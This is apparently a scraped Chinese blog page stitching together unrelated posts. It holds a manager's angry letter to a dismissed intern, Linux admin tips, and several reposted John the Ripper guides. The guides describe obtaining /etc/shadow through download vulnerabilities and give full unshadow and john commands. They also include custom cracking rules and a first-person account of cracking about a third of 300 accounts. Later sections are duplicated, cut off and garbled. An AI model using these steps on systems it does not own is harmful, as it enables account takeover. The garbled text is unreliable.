再遇到其他类似的case，完全一个思维方式的case你还能有如此精细的方法吗，你只记得了我教你的形式，忘记了我非常在意的你能否体会的本质。既然已经浪费时间来写这些，我就再对你讲一次我的一点看法。所有的产品及服务的落地点都是用户，所有运营的核心就是把需要的信息（产品、服务）以他喜欢活习惯至少是可接受的方式放在他的面前，甚至为你讲解了一个互联网的产业链条为何有市场、产品、运营、BD等以及这些岗位都是在做什么。团购仅仅是电子商务的一个变种，电子商务的核心竞争力一定是运营能力，运营包含了服务质量、产品的匹配度、以及用户的可承受底线。落地到团购业务，服务质量是订单的处理能力、商品的的质量、发货周期、支付便捷性、支付安全性等一系列问题。产品的匹配度不用多讲——你给男人卖卫生巾绝对不会有人买单，那么应该让BD去谈什么合作？与团购网站本站用户最多数的用户集群属性相关的物品或者服务，落地到绝大多数的网站用户群，即普遍中国网民的金字塔结构底端。他们需要什么？衣食住行相关的能覆盖到绝大多数共性需求的服务或物品。我还记得我为了让你理解这个思维模式，举的是淘宝近几年销售额产品类别分布的数据以及为什么。可承受度的底线是什么？你的普遍用户群体的收入，为了服务可付出的收入比例，我还清楚的记得我举了两个例子：
1、09、10年淘宝的销售额以单品售价来看分别集中在哪一个价格区间？
2、什么是真正的高价值用户——腾讯用户群最为明显，那些学生、收入低下的人群，一个月他们肯拿自己可支配财力的10-20%去购买腾讯的特权服务，为什么？我这类的用户看似高端，也是腾讯的忠实用户，但对商业来讲，绝不是腾讯的高价值用户
记得以后再遇到任何模式的业务时，都可以用这种拆分用户需求属性为多维度去聚焦的方式。
这些内容的深度，如果是你自己总结的，那么你确实是天才。但是天才往往都是假象，你所说的这些思维方式，数个和我共事过的同事一看都能看出事我的风格，让你要出言中伤的那个人，才是让你受到诸多光环的真正原因吗？
答复你的连载五
这是基本的职业素养、职业操守的问题，这种问题是一个职业人根本不应有的，甚至不可饶恕的。你身为一个team里的一员，即时是曾经的team，你泄露的这些东西，是多少人的工作成果
分配给你的任务，你这次别说没有给我反馈结果性的有价值的信息，最后干脆直接就不做了，不不了了之，因为你觉得你做好了，你做的挺出色，你获得了表扬。可你忽略了是为什么？有几成是我们这些大哥大姐为了让刚进职场你的竖立信心的苦心，你又怎么可能知道你在深入其他的部门工作的时候，我对同事有过什么嘱托？对此我甚至不想评价。这是我开始对你的工作、你这个人进行评估的第一个时间节点。
因为你个人感情因素，无组织无纪律的旷工数次，甚至都不打招呼。身为过来人的我，牺牲个人工作时间陪你谈了两个小时的心，帮你解决生活问题。两个小时来谈心!这对于我当时的工作饱和度来讲是多么的奢侈的事情，你还能否记得你们全都离开公司了我留下加班，动辄凌晨甚至通宵第二天还要续航的情景？
提到推荐你去百度的事情我就更加难过，我已经确定的发现你适合从产品入手开始你的职业生活，并且你不适合变化性特别强需要强适应能力的公司，而且你的思维始终停留在用户层级，商业层级是完全没有任何感觉的。所以我本着特别想为你负责的态度，想推荐你去百度的哥们那里，一个我信任的哥们，知道我把你托付出去是对得起你的地方。你以为推荐你你就一定进的去吗？你以为我为了萍水相逢的你还要去求朋友帮忙是完全不用欠下人情的事情吗？甚至我有必要你试探你的忠诚度吗？一个连执行层面的工作都没有结果，时刻都会因为个人情感问题放下自己责任的性格，你在这个体系中的价值，真的有你认为的那么重要？
答复你的连载六
这是让我看到最最难过的一章。
原因很简单，为你做了这么多事情，你甚至连RP上都要来说点事情。我需要窃取你的劳动成果？我安排你做的每一件事情，都是我亲自得到过结论的事情。为什么还要让你再去做一遍？因为需要我重点去关注的内容，完全都是关键节点的内容，你梳理清楚这些东西的话，整个体系你就会慢慢体会到。真是用心良苦，你真是不知深浅。
另外想再告诉你一点，所有人共事，是一个team。team一定需要有一个对外的出口，所有team所取得的成就是属于这个team 所有人的，不是任何一个人的。做事是分方法的，我如果让你一个实习生去push一个高你N个level的员工，那我真的不配做你的领导了，这不光是对工作的不负责，因为一定没有结果，对方不会买你的帐。也是对团队稳定性的不负责，在任何公司，有这种对接的情况发生吗？
你的团队精神，让我太失望了。
至于你要给我争脸经过你的诠释，真是伤人，这仅仅是我对你鼓励的一种方式而已。
答复你的连载七
整个CRM以及流程的问题，你把我的观点原封不动的搬过来展示你的高明是非常愚蠢的，干过这个行业的人都会懂，一个真正企业级的CRM，是不是一个大三的学生有机会去接触到的。
至于工作方面我的态度问题，更是完全杜撰的事情。那么多业务线负责人，那么多战友站在那里，你也敢说的出口，你的胆量大的惊人，试问以后哪个领导还敢用你。是否你的小说些到这里，你已经陷入疯狂？你想出风头想到发狂了吧？
至于把你带到楼下谈心，你拍拍胸脯说为了什么？这是你第N次（N大于一个手的手指）的无故旷工后我不得不做的事情，出于对你的溺爱，你在我这里的特权已经大的惊人了。大道我不能跟团队里的每一个人交代，大到大家都可以看一个笑话。我找你谈心的主要内容是态度问题，为何你避而不谈？
至于功高盖主，实在可笑。我当时对你说的是：“你在我这里怎样都无所谓，第一我不介意，第二你也不会对我造成任何威胁。但是如果你换一个领导，换一个公司，如果你命不好，你将会失去很多你本应该拥有的机会。这种性格严重缺陷一定要注意，会是你职业生涯的最大的绊脚石。我举的例子是刘邦与韩信。”摸摸你的良心，在给你的工作全都一塌糊涂，连你最初打动我的职业态度都变化的不像样子，甚至让我已经肯定了最初的假象的时候，我对你做的，还仅仅局限在一个领导吗？
我最大的败笔就是在于因为个人的情感因素，违背了很多我一直都非常重视的职业性。
答复你的连载八
你不必杜撰，也不必猜测。我让你离职的原因无他，是态度问题。
我可以容忍一个人工作没做好，因为你小，因为我没有尽到做领导的责任教授给你有效的工作方法。但是我绝对不可容忍一个人不负责，甚至不为自己说过的话负责。
你辞职前的3、4天，当我晚上11点工作完给你去电话，问你为何不请假也不打招呼再次无故旷工，你很兴奋的告诉我你在做自己的这个那个的事情。你和雷军谈什么什么，你要重视这个机会。但是你必须弄明白，你目前的身份是一个team的一份子。我并不严厉的要求你以后必须遵守制度，你答应的非常痛快，第二天，第三天等待着我的依然是你的旷工。
出于我的职业性，我对公司，对部门，对自己的负责。我可做出的选择无他，只能要求你离职。
至于如果产品部问我要人的事情，不必再坐地起自己的身价。以我的性格，如果他们来要你，我在已经判断出你更适合走产品路线的时候我不但说放人，还一定会嘱托他们多加照顾重点培养。
到你离职的那一天，我甚至不想看见你，因为我的内心也非常难过，我见过太多天才的迷失以及浪费时间，本来我的本意，是帮助你，帮你挡住风吹雨打，让你茁壮成长。
即便我知道你成长起来之后也会去寻找自己的一片天空
最后，祝福你在你以后的学业，事业上能有好的未来和归属。
我嘱托你的那些性格明显缺陷的方面，你能真正的听在心里。
好自为之，各自珍重。

Related Posts

• 0

一般人的解决办法是

rpm -e cracklib-dicts –nodeps
yum install cracklib-dicts

其实只需要

yum reinstall cracklib-dicts

Related Posts

• 破解Linux系统密码就用强大的john(0)
• 如何选择VPS虚拟主机的系统以及版本(2)
• 20个配置安全Nginx Web服务器的方法(0)
• 给linux centos 添加第三方源(0)
• 烦死了,删除centos自带的php,mysql(0)
• 一键优化centos服务(1)
• VPS上安装VPN的详细解答(0)
• CentOS5.3下xen虚拟机的配置笔记(0)
• 你的Wordpress密码忘记了? 这里有简单的方法取回(0)

想在OpenVZ上实验一下的可以执行(需要系统有gcc):

[root@localhost ~]# wget http://hostingfu.com/files/vzfree/vzfree-0.1.tgz
[root@localhost ~]# tar zxvf vzfree-0.1.tgz
vzfree-0.1/
vzfree-0.1/vzfree.c
vzfree-0.1/Makefile
[root@localhost ~]# cd vzfree-0.1
[root@localhost vzfree-0.1]# ls
Makefile  vzfree.c
[root@localhost vzfree-0.1]# make
cc -O2 -s    vzfree.c   -o vzfree
[root@localhost vzfree-0.1]# ./vzfree
             Total     Used     Free
Kernel:   2048.00M    3.83M 2044.17M
Allocate:  256.00M  176.24M   79.76M (128M Guaranteed)
Commit:    128.00M  138.58M  -10.58M (76.5% of Allocated)
Swap:                 1.68M          (1.2% of Committed)
[root@localhost vzfree-0.1]#

其中中Kernel对应的是

母鸡中所有程序占用的内核内存

Commit是母鸡使用的物理内存+swap

Swap是母鸡共使用了多少swap。

其实就是分析/proc/user_beancounters这个文件算出来的.

Related Posts

• 如何选择VPS虚拟主机的系统以及版本(2)
• 关于VPS和网络的一些注意事项(0)
• VPS上安装VPN的详细解答(0)
• CentOS5.3下xen虚拟机的配置笔记(0)

有时候我们会得到一些密码,类似这样:

root:$1$$q6Ao87xNrArOYJfWf6WRj.:0:0:root:/:/bin/sh

想破解?试试john吧!

通过一些漏洞我们很容易就能搞到Linux服务器下面的/etc/passwd,/etc/shadow这两个文件，在早期的版本里面这两个文件其实就是一体的，后来为了安全把他们分开，其中/etc/shadow这个文件只有ROOT老大这个用户才能查看的，其他的用户没有这个权限，这样就大大加大了安全性。
现在的任意下载漏洞就能帮助我们很轻松的高到这两个文件，原因很简单，如果程序没有过滤严格，就让我们有机可乘了，苍蝇不叮无缝之蛋还是经久不衰的哲理的。
好了，我们开始破解这个文件
假如你现在就在Linux环境下就直接执行下面语句下载吧

wget http://www.openwall.com/john/g/john-1.7.6.tar.gz

下载成功后，我们来安装这个程序
先解压，使用命令

tar zxvf john-1.7.6.tar.gz

解压后进入解压好的目录

root@manage-computer:/home/manage# cd john-1.7.6

进入src目录

root@manage-computer:/home/manage/john-1.7.6# cd src/

root@manage-computer:/home/manage/john-1.7.6/src# make

root@manage-computer:/home/manage/john-1.7.6/src# make linux-x86-any

完成后进入run目录

root@manage-computer:/home/manage/john-1.7.6/src# cd ../run

然后复制搞到的两个文件，你懂的哦，后面有个点？呵呵 就算复制到当前目录

root@manage-computer:/home/manage/john-1.7.6/run# cp /etc/passwd /etc/shadow .

开始破解

root@manage-computer:/home/manage/john-1.7.6/run# ./unshadow passwd shadow >mypasswd

root@manage-computer:/home/manage/john-1.7.6/run# ./john mypasswd

不浪费时间我就添加了一个用户test的，密码123456，很快就给搞定了哦。如下图

好了，就到这里。

———————————————————————————–

安装和利用john破解linux密码

2010年02月13日 星期六 16:37

   1. #cd /tmp   

     #wget http://www.openwall.com/john/g/john-1.7.4.2.tar.gz

      #tar -zxvf john-1.7.4.2.tar.gz

     # cd john-1.7.4.2

     # cd src

     #make linux-x86-any-a.out

或者使用sudo apt-get install john

2：unshadow /etc/passwd /etc/shadow >passwd.txt (注意只有root才能执行unshadow，

                                                                        因为只有root才能读取/etc/shadow。）

3：chmod 600 passwd.txt

4: john passwd.txt

此外，如果已经破解成功，则可以查看john.pot来查看。

＃john -show passwd.txt

＃john -show -users:yujs passwd.txt

获得指定用户的密码。

John the Ripper的四种破解模式

「字典档」破解模式（Wordlist Mode）

这在John所支援的破解模式中是最简单的一种，你要做的唯一工作就是告诉John字典档在哪（字典档就是文字档，内容每行一个单字代表试验的密码），好让它可以取出破解。在「字典档」破解模式里可以使用「字词变化」功能，来让这些规则自动的套用在每个读入的单字中，以增加破解的机率。

「简单」破解模式（Single Crack）

「简单」破解模式是专门针对「使用帐号当作密码」的懒人所设计的；所谓「使用帐号当作密码」的意思是，如果一个使用者帐号是「john」，它的密码也取为「john」。在「简单」破解模式里john会拿密码档内的「帐号」栏位等相关资讯来破解密码，并且使用多种「字词变化」的规则套用到的「帐号」内，以增加破解的机率。如帐号「john」，它会尝试用「john」、「john0」、「njoh」、「j0hn」….等规则变化来尝试密码的可能性。

「增强」破解模式（Incremental Mode）

这是John里面功能最强大的破解模式，它会自动尝试所有可能的字元组合，然后当作密码来破解。这个破解模式所需要的时间非常冗长，因为要尝试组合字元是非常耗费时间的，所以John才会定义一些「字元频率表」（character frequencytables）来帮助破解。简言之这个破解方法就是「暴力法」，把所有可能的密码组合都测试一次，来得到正确的结果。

「外挂模组」破解模式（External Mode）

这个破解模式是让使用者可以自己用C语言写一些「破解模组程式」，然后挂在John里面来使用。其实所谓的「破解模组程式」就是一些用C语言设计好的副函示，然后它的功能就是产生出一些单字来让John尝试破解。而

在执行John程式时，它在载入这些「破解模组程式」时会自动编译这些C语言副函示然后来使用。 （真伟大，光这点就让笔者佩服五体投地）

John the Ripper命令列参数说明

【命令列指令】

john [-命令列参数] [密码档档名]

【命令列参数】

参数：-single

说明：使用「简单」（Single Crack）破解模式解密，主要是根据使用者的「帐号」产生变化来猜测解密，其变化规则记录在JOHN.INI档案的[List.Rules:Single]区域内。 （稍后会再介绍）

范例：john -single passwd

参数：-wordfile:[字典档档名] -stdin

说明：使用「字典档」破解模式解密，由字典档内读取单字来破解；或是可以加上-stdin参数，代表由键盘输入单字来破解。

范例：john -wordfile:bigdict.dic passwd

参数：-rules

说明：在「字典档」破解模式下，开启字词规则变化功能，如「字典档」读入单字cook，则开启字词变化下，程式可能会尝试cook、c00k、cooker、cook0…等其它字词。详细变化规则记录在JOHN.INI档案的[List.Rules:Wordlist]区域内。（稍后会再介绍）

范例：john -wordfile:bigdict.dic -rules passw

参数：-incremental[:模式名称]（参数也可以简写成-i[:模式名称]）

说明：使用「增强」破解模式解密，就是组合所有可能的字元当作密码来破解。在JOHN.INI档案内的[Incremental:*****]区域里定义好许多的模式名称，可以指定使用哪一个模式来破解。 （稍后会再介绍）

范例：john -i:all passwd

参数：-external:[模组名称]

说明：使用「外挂模组」破解模式解密，使用者可以自己撰写额外的「破解模组程式」。 「破解模组程式」是记录在JOHN.INI档案内的[List.External:******]区域内。

范例：john -external:double passwd

参数：-stdout[:LENGTH]

说明：这个选项跟破解没有任何关系，只是单纯显示John所产生出来的单字到萤幕上。

范例：john –i:all –stdout

参数：-restore[:回复档案名称]

说明：继续上次中断的解密工作。 John在执行破解密码工作时，可以按下＜CTRLC＞键中断工作，而当前的解密进度情形会被存放在一个名为「restore」的档案内。而使用「-restore」参数，可以从「restore」档案内读取上一次破解时候中断的位置，然后接下去继续破解。

范例：john –restore

参数：-session[:记录档档名]

说明：这个选项是让你设定目前工作记录档（session file）的档名。所谓的工作记录档就是可以用「-restore」参数回复工作的档案。另外，在使用John做多工破解工作时，使用「-session」参数可以为每个工作设定各别的记录档，而不会混在一起。

范例：john –wordfile:bigdict.dic –session:work1 passwd

参数：-status[:记录档档名]

说明：显示工作记录档里面所记录的工作状态。

范例：john –status:restore

参数：-makechars:[档名]

说明：制作「字元频率表」。这个选项会以目前已破解出的密码为基础，来产生「字元频率表」（注：John会把已破解出的密码记录在JOHN.POT档案内，）。如果所指定档名的档案已经存在的话，会被覆写。此选项产生出来的档案，可以用在「增强」破解模式上。

范例：john –makechars:ownchars

参数：-show

说明：显示目前已经破解出的密码。因为JOHN.POT档案内并不储存「帐号」资料，所以使用时你应该同时输入相对应的密码档。

范例：john –show passwd

参数：-test

说明：测试目前机器执行John各类型密码破解时的速度。

范例：john –test

参数：-users:[-]LOGIN｜UID [,..]

说明：只破解某个「帐号」的密码，如只针对root或拥有root权利UID=0的使用者。 （若在LOGIN｜UID名称前加上“－”符号则是相反，表示不要破解这个「帐号」的密码）

范例：john –i:all –users:root passwd

参数：-groups:[-]UID[,..]

说明：只破解某个「群组」内用户的密码。 （若在UID名称前加上“－”符号则是相反，表示不要破解这个「群组」内用户的密码）

范例：john –i:all –groups:100

参数：-shells:[-]SHELL [,..]

说明：和上面两个参数一样，这个选项是只针对所有可以使用shell的用户进行破解密码工作，对其它用户不予理会。（若在SHELL名称前加上“－”符号则是相反，表示不要破解可以使用这个SHELL的用户的密码）。指定SHELL时，你可以省略绝对路径，如参数「-shells:csh」就会包含「/bin/csh」或「/usr/bin/csh」等路径，但如果你指定的是「-shells:/bin/csh」则只会包含「/bin/csh」这个SHELL名称。

范例：john –i:all –shells:csh passwd

参数：-salts:[-]COUNT

说明：只破解「salts」大于「COUNT」的帐号的密码，可以使你得到较佳破解速度（所谓「salts」是指UNIX拿来作为「密码」编码基础的单位）。举例来说，你可以先只破解某部分用户的密码「-salts:2」来获得较佳的速度，然后有时间时才破解剩余用户的密码「-salts:-2」。

范例：john –i:all –salts:2 passwd

参数：-format:NAME与-savemem:LEVEL

说明：这两个参数是有关John内部运作的设定，跟破解本身没有直接关系，所以省略不介绍。

————————————————————————————-

利用john破解Linux系统密码

时间：2011年3月16日   分类：常用工具   发布：admin

一、下载john (官方网站http://www.openwall.com/john/)
下载最新版 wget  http://www.openwall.com/john/g/john-1.7.6.tar.gz

1. #cd /tmp   
    #wget http://www.openwall.com/john/g/john-1.7.4.2.tar.gz
    #tar -zxvf john-1.7.4.2.tar.gz
    # cd john-1.7.4.2
    # cd src
    #make linux-x86-any-a.out
或者使用yum install john
2：unshadow /etc/passwd /etc/shadow >passwd.txt (注意只有root才能执行unshadow，
                                                                        因为只有root才能读取/etc/shadow。）
3：chmod 600 passwd.txt
4: john passwd.txt
此外，如果已经破解成功，则可以查看john.pot来查看。
＃john -show passwd.txt
＃john -show -users:yujs passwd.txt
获得指定用户的密码。
John the Ripper的四种破解模式

「字典档」破解模式（Wordlist Mode）
这在John所支援的破解模式中是最简单的一种，你要做的唯一工作就是告诉John字典档在哪（字典档就是文字档，内容每行一个单字代表试验的密码），好 让它可以取出破解。在「字典档」破解模式里可以使用「字词变化」功能，来让这些规则自动的套用在每个读入的单字中，以增加破解的机率。

「简单」破解模式（Single Crack）
「简单」破解模式是专门针对「使用帐号当作密码」的懒人所设计的；所谓「使用帐号当作密码」的意思是，如果一个使用者帐号是「john」，它的密码也取为 「john」。在「简单」破解模式里john会拿密码档内的「帐号」栏位等相关资讯来破解密码，并且使用多种「字词变化」的规则套用到的「帐号」内，以增 加破解的机率。如帐号「john」，它会尝试用「john」、「john0」、「njoh」、「j0hn」….等规则变化来尝试密码的可能性。

「增强」破解模式（Incremental Mode）
��」。这个选项会以目前已破解出的密码为基础，来产生「字元频率表」（注：John会把已破解出的密码记录在JOHN.POT档案 内，）。如果所指定档名的档案已经存在的话，会被覆写。此选项产生出来的档案，可以用在「增强」破解模式上。

范例：john –makechars:ownchars

参数：-show
说明：显示目前已经破解出的密码。因为JOHN.POT档案内并不储存「帐号」资料，所以使用时你应该同时输入相对应的密码档。

范例：john –show passwd

参数：-test
说明：测试目前机器执行John各类型密码破解时的速度。

范例：john –test

参数：-users:[-]LOGIN｜UID [,..]
说明：只破解某个「帐号」的密码，如只针对root或拥有root权利UID=0的使用者。 （若在LOGIN｜UID名称前加上“－”符号则是相反，表示不要破解这个「帐号」的密码）

范例：john –i:all –users:root passwd

参数：-groups:[-]UID[,..]
说明：只破解某个「群组」内用户的密码。 （若在UID名称前加上“－”符号则是相反，表示不要破解这个「群组」内用户的密码）
范例：john –i:all –groups:100
参数：-shells:[-]SHELL [,..]
说明：和上面两个参数一样，这个选项是只针对所有可以使用shell的用户进行破解密码工作，对其它用户不予理会。（若在SHELL名称前加上“－”符号 则是相反，表示不要破解可以使用这个SHELL的用户的密码）。指定SHELL时，你可以省略绝对路径，如参数「-shells:csh」就会包含 「/bin/csh」或「/usr/bin/csh」等路径，但如果你指定的是「-shells:/bin/csh」则只会包含「/bin/csh」这个 SHELL名称。
范例：john –i:all –shells:csh passwd

参数：-salts:[-]COUNT
说明：只破解「salts」大于「COUNT」的帐号的密码，可以使你得到较佳破解速度（所谓「salts」是指UNIX拿来作为「密码」编码基础的单 位）。举例来说，你可以先只破解某部分用户的密码「-salts:2」来获得较佳的速度，然后有时间时才破解剩余用户的密码「-salts:-2」。

范例：john –i:all –salts:2 passwd

参数：-format:NAME与-savemem:LEVEL
说明：这两个参数是有关John内部运作的设定，跟破解本身没有直接关系，所以省略不介绍。

最常用的两个：john -w:all.txt passwd.txt

                        john -show passwd.txt >/pass.txt 把解密结果保存到pass.txt里面。

字典可以到http://www.milw0rm.com/上在下载

john的几个用法 

脱离字典档用暴力法破密码只要加上参数-i:all  
就可破象5e5t56e6这样的密码了。  
破解到一半因种种原因需要暂时停止破解，按ctrl+c,  
下次破解不必从新来过，只要john   -restore:restore即可接着破。  
john在纯dos下要比在win95下快，用unix更快，  
建议在linux下运行因为crypt函数系统本身就有，  
会快一点吧!? 

john笨招
说说我用JOHN的经历和成果：  
（PASSWD   有300来个ACCOUNT,   一般无防犯）  
1.  
john   -w:password.lst   passwd  
成功10个左右。  
2.  
john   -si   passwd  
成功（增加，后同）35个左右。  
3.  
john   -i   passwd  
将minlen,   maxlen都设成5，  
成功1个root（以后不可能啦）。  
4.  
john   -i   passwd  
改john.ini，1个字母加3个数字：成功1个左右。  
改john.ini，1个字母加4个数字：成功5个左右。  
5.  
john   -w:password.lst   -rules   passwd  
成功3个左右。  
6.  
xtract   \bdc\ck-x?.pms   >   myword1.lst  
john   -w:myword1.lst   -rules   passwd  
（BDC小学词库）成功5个左右。  
7.  
xtract   passwd   >   names.lst  
(sort,etc.)  
john   -w:names.lst   -rules   passwd  
成功2个左右。  
8.  
将john.ini中Single   ->   SingleOLD  
自己再造一个，各次分别加入  
l$[0-9]$[0-9]  
成功5个左右。  
l$[0-9]$[0-9]$[0-9]$[0-9]  
成功5个左右。  
l^[0-9]^[0-9]^[0-9]  
成功1个。  
l$[a-z]$[a-z]$[a-z]  
成功5个左右。  
l^[a-z]^[a-z]^[a-z]  
成功10个左右（很多人用类似tsh*）。  
etc.  
john   -si   passwd  
（不算太慢）  
9.  
将john.ini中Wordlist   ->   *OLD  
自己再造一个，各次分别加入类似8。  
成功2个左右。  
john   -w:word.lst   -rules   password  
总共有100左右，1/3。 

john.ini   建立自己的模式例子  
比如，在incremental:all模式完毕后，添加如下行，即可得到一个自己的模式  
两个字母＋4位数字。61，62中的字母顺序是拷贝以前的东东的，无所谓，只要  
把26个都列上就可以了。这个模式并命名为zylin1d。  
[Incremental:zylin1d]  
CharCount   =   36  
MinLen   =   6  
MaxLen   =   6  
Charset61   =   smbcpadtrjhgflkwneoivzquyx  
Charset62   =   aoeiurhlntmpscwybkdgvfxjzq  
Charset63   =   0123456789  
Charset64   =   0123456789  
Charset65   =   0123456789  
Charset66   =   0123456789  
以后要调用这个模式时，只要用john   -i:zylin1d   passwd   就可以了。

一份JOHN   的功能介绍（转载）  
原作者ROOT  
          John   the   Ripper  
          是什么东西？如果直译其名字的话就是：JOHN的撕裂者（工具）。翻译的很难听吧。  
          实际上它是一个工具软件，用于在已知密文的情况下尝试破解出明文的破解密码软件?
          目前的最新版本是JOHN  
          1.4版，主要支持对DES、MD5两种加密方式的密文进行破解工作。它可以工作于多中不不同的机型以及多种不同的操作系统之下，目前已经测试过能够正常运行的操作系统有：Linu  
          x86,   FreeBSD   x86,   Solaris   2.x   SPARC,   OSF/1   Alpha,   DOS,WinNT/Win95。  
          在1998年年初，JOHN1.4已经针对INTEL的MMX处理器进行了针对性的优化,速度可快30%%左右。  
          如果你想了解最新的动态，请访问：http://www.false.com/security/john/,这里是JJOHN的窝点。      
          ——————————  
          使用预览  
          ——————————  
          以下快速入门针对PC用户。  
          假设你已经取得了某个SHADOW文件，并且被存为SHADOW.TXT文件。  
          在你的硬盘中建一个新的目录，如HACK  
          进入这个目录，将JOHN1.4在此目录中解开，将SHADOW.TXT同样拷入此目录，这样我们们就完成了解密的准备工作?
          现在开始进行解密步骤：  
          1、先消灭FOOL   USER，就是“笨蛋用户”：  
          john   -single   shadow.txt  
          2、再消灭稍微聪明一点的用户：  
          john   -wordfile:password.lst   -rules   shadow.txt  
          3、最后进行大屠杀：  
          john   -i:all   shadow.txt  
          当然了，第三步可能要你的电脑跑上10000年。  
          解释：  
          1、第一步主要针对笨蛋而进行的，原理是根据用户的名称，加上常见的变化而猜测密密码。一般所谓的笨蛋是这样的，比如此用户叫fool，而他的密码是fool123、fool1、loof、loof123、lofo…。这样的用户一般在一分钟内会被全部消灭?
          2、第二部是使用字典文件来进行解密，不为什么，只是因为设置密码的是人而不是晃   数则在此基础上再加上?变化，如字典中有单词cool，则JOHN还会?
  行解密。一般视SHADOW中的用户多少及你的字典大小、你的机器速度，解密时间从几小时档   几天不等。  
          3、第三步是纯粹的碰运气解法，主要原理是遍历所有可能的密匙空间。JOHN会尝试以以95个字母（因为从键盘上只能输入95种可能的键值）进行1-8（8个字母是密码的最长值，所有密码中8位以后的部分均不会被使用，目前的DES加密体系就是这?
程，我们计算一下：以仅攻击一个用户为例，MMX200微机一台（攻击速度18000次/秒），假假设遍历50%的密码空间，需要的时间为?
          (95^8+95^7+95^6+95^7+95^6+…..+95^1)/2/18000=6.7047809E15/18000=3.7248783E3E11秒=10346884.19小时=4311201.745天=11811.5年?
          还好在JOHN可以进行自动预设取值。所以这样破解密码还是可能的，一般的经验是20父   小时可能破解一个，可能什么都没有。  
          本文后面介绍的经验可以帮助你尽快地进行破解。  
          ————————–  
          详细功能说明  
          ————————–  
          John   the   Ripper  
          1.4是目前比较好的破解密码工具，在解密过程中会自动定时存盘,你也可以强迫中断浇   密过程（用ctrl+c），下次还可以从中断的地方继续进行下去（john  
          -restore），任何时候敲击键盘，你就可以看到整个解密的进行情况，所有已经被破浇獾   密码会被保存在当前目录下的JOHN.POT文件中，SHADOW中所有密文相同的用户会被归成一类，这样JOHN就不会进行无谓的重复劳动了。  
          在程序的设计中，关键的密码生成的条件被放在JOHN.INI文件中，你可以自行修改设种   ，不仅支持单?类型的变化，而且支持自己编写C的小程序限制密码的取值方式。  
          唯一的遗憾是：在自动产生密码的遍历解密方法中不支持-rules选项。不过还好有方贩   可以克服。  
          命令行的参数功能解释  
          ———————–  
          命令行方式:   john   [-功能选项]   [密码文件名]  
          功能选项（所有的选项均对大小写不敏感，而且也不需要全部输入，只要在保证不与齐其他参数冲突的前提下输入即可，如-restor  
          参数只要输入-res即可）：  
          -pwfile:[,..]  
          用于指定存放密文所在的文件名，（可以输入多个，文件名一我“，”分隔，也可以适褂?或者?这两个通配符引用一批文件）。也可以不使用此参数，将文件名放在命令行的最后即可。  
          -wordfile: <字典文件名>   -stdin  
          指定的用于解密用的字典文件名。你也可以使用STDIO来输入，就是在键盘中输入。  
          -rules  
          在解密过程中使用单词规则变化功能。如将尝试cool单词的其他可能，如COOLER、Coool等，详细规则可以在JOHN.INI文件中的[List.Rules:Wordlist]部分查到，我们在下面详细解释。  
          -incremental[: <模式名称> ]  
          使用遍历模式，就是组合密码的所有可能情况，同样可以在JOHN.INI文件中的[Incremmental:*****]部分查到，我们在下面详细解释。  
          -single  
          使用单一模式进行解密，主要是根据用户名产生变化来猜测解密，可以消灭笨蛋用户   其组合规则可以在JOHN.INI文件中的[List.Rules:Single]部分查到，我们在下面详细解释。  
          -external: <模式名称>  
          使用自定义的扩展解密模式,你可以在john.ini中定义自己需要的密码组合方式。JOHNN也在INI文件中给出了几个示例，在INI文件的[List.External:******]中。  
          所定义的自订破解功能.  
          -restore[: <文件名> ]  
          继续上次的破解工作，JOHN被中断后，当前的解密进度情况被存放在RESTORE文件中，，你可以拷贝这个文件到一个新的文件中。如果参数后不带文件名，JOHN默认使用RESTORE文件?
          -makechars: <文件名>  
          制作一个字符表,你所指定的文件如果存在，则将会被覆盖。JOHN尝试使用内在规则在在相应密匙空间中生成一个最有可能击中的密码组合，它会参考在JOHN.POT文件中已经存在的密匙?
          -show  
          显示已经破解出的密码，因为JOHN.POT文件中并不包含用户名，同时你应该输入相应档   包含密码的文件名，JOHN会输出已经被解密的用户连同密码的详细表格。  
          -test  
          测试当前机器运行JOHN的解密速度，需要1分钟，它会得出在当前的情况下解密的各种种可能情况下相应的解密速度，如同时解密100个用户时的平均速度，使用遍历法解密模式时解密的速度。salts指用户个数，如果给出的对于100个用户解密的平  
个用户解密，解密的速度为每个180次/秒。因为绝大多数的时间被用于密匙比较过程中了。。所以应该对用户进行挑选?
          -users:[，..]  
          只破解某类型的用户或者属于某个组的用户。如果得到的PASSWD文件没有包含密文，哪   么在得到SHADOW后应该进行组合，JOHN的附带程序UNSHADOW.EXE可以完成这一过程，当然了，你也可以手工做。一般的能够进入CSH的用户都是解密的首选对象  
          -shells:[!][，..]  
          和上面的参数一样，这一选项可以选择对所有可以使用shell的用户进行解密，对其他他用户不予理睬。“！”就是表示不要某些类型的用户。例如：?
          -shells：csh”。  
          -salts:[!]  
          只选择解密用户大于的帐号，可以使你得到选择的权利，尽快的得到所需要的用户的P腜ASS?
          -lamesalts   指定用户中密码所使用的cleartext。(我不大清楚此功能的作用)。  
          -timeout: <几分钟>   指定解密持续的时间是几分钟，到时间JOHN自动停止运行。  
          -list  
          -shells:[!][，..]  
          和上面的参数一样，这一选项可以选择对所有可以使用shell的用户进行解密，对其他的包含密码的文件名，JOHN会输出已经被解密的用户连同密码的详细表格。  
          -shells：csh”。  
          -salts:[!]  
          只选择解密用户大于的帐号，可以使你得到选择的权利，尽快的得到所需要的用户的P。所以应该对用户进行挑选?
          -lamesalts   指定用户中密码所使用的cleartext。(我不大清楚此功能的作用)。  
          -timeout: <几分钟>   指定解密持续的时间是几分钟，到时间JOHN自动停止运行。  
          -list  
          在解密过程中在屏幕上列出所有正在尝试使用的密码，建议不要使用，它会将大部分?
          -beep   -quiet   当解密出密码时是否要让PC喇叭叫一下，以提醒你。  
          -noname   -nohash   不使用内存来保存“用户名”等内容。  
          -des   -md5   指定使用的解密方式是解DES还是MD5，对于解密DES密码不用理会这一选?
          (待续） 

          john解密模式详解  
          —————————  
          一、   “Single   Crack ”   模式-即“简单解密模式”  
          ——————————————  
          这一模式是“john”的独到的地方，主要原理是根据用户名猜测其可能的密码，当然亮   ，解密者是计算机而不是人，所以需要人为定义相应的模式内容。  
          其模式的定义在john.ini中的[List.Rules:Single]部分，我们选取前几行给大家做一   个解释，假设有一用户名为fool：  
          [List.Rules:Single]  
          ###  
          #   Single   crack   mode   rules,   extended   Crack   syntax  
          ###  
          #   Simple   rules   come   first…  
          :[:cl]———————————–注释1  
          #   These   were   not   included   in   crackers   I ‘ve   seen,   but   are   pretty   efficient  
          #   so   I   include   them   near   the   beginning  
          > 6×06————————————注释2  
          > 7lx07———————————–注释3  
          > 6/?ulx06——————————–注释4  
          > 5×05————————————注释5  
